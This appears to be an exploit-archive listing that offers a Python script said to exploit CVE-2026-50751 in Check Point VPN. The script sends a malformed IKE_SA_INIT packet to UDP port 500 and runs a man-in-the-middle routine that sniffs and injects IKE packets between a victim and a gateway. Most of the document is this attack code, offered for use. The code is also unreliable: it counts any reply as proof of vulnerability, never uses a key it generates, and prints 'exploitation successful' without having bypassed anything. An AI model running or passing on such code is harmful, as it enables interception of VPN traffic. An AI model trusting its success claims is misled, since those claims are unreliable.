Share
## https://sploitus.com/exploit?id=PACKETSTORM:223316
==================================================================================================================================
| # Title : Check Point VPN IKE Legacy Auth Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A Python script attempting to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed
IKE_SA_INIT packet to UDP port 500, detecting whether the target responds
as an indicator of exploitability, then executing a MITM attack to intercept IKE packets between a victim and a VPN gateway.
[+] POC :
#!/usr/bin/env python3
import socket
import struct
import sys
import time
from scapy.all import *
from cryptography.hazmat.primitives.asymmetric import x25519
from cryptography.hazmat.primitives import serialization
class CVE202650751Exploit:
def __init__(self, target_ip, target_port=500):
self.target_ip = target_ip
self.target_port = target_port
self.sock = None
def create_ike_sa_init(self):
"""Create a fake IKE_SA_INIT package"""
ike_header = struct.pack('!BBBB I I I',
0x20,
0x20,
0x00,
0x00,
0x00000001,
0x00000000,
0x00000001
)
legacy_payload = bytes([
0x20,
0x00,
0x00, 0x04,
0x01, 0x02, 0x03, 0x04
])
return ike_header + legacy_payload
def exploit_legacy_auth(self):
"""Exploiting weak authentication from existing customers"""
print(f"[*] Targeting {self.target_ip}:{self.target_port}")
private_key = x25519.X25519PrivateKey.generate()
public_key = private_key.public_key()
packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port)
ike_data = self.create_ike_sa_init()
print("[*] Sending malicious IKE packet...")
try:
response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0)
if response:
print("[+] Received response - Target may be vulnerable")
return True
except Exception as e:
print(f"[-] Exploit failed: {e}")
return False
def mitm_attack(self, victim_ip, vpn_gateway):
"""Man-in-the-middle attack to intercept VPN communications"""
print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}")
def packet_handler(pkt):
if IP in pkt and UDP in pkt:
if pkt[UDP].dport == 500 or pkt[UDP].sport == 500:
print(f"[+] Intercepted IKE packet from {pkt[IP].src}")
modified_payload = pkt[Raw].load + b'\x00\x00\x00\x01BAD'
send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/
UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/
Raw(load=modified_payload), verbose=0)
sniff(filter=f"host {victim_ip} and host {vpn_gateway} and port 500",
prn=packet_handler, store=0)
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip> [victim_ip]")
sys.exit(1)
exploit = CVE202650751Exploit(sys.argv[1])
if exploit.exploit_legacy_auth():
print("\n[!] VULNERABLE - Legacy client authentication bypass possible!")
print("[!] CVE-2026-50751 exploitation successful")
if len(sys.argv) == 3:
print(f"[*] Initiating MITM attack against {sys.argv[2]}")
exploit.mitm_attack(sys.argv[2], sys.argv[1])
else:
print("\n[+] Target appears patched or not vulnerable")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================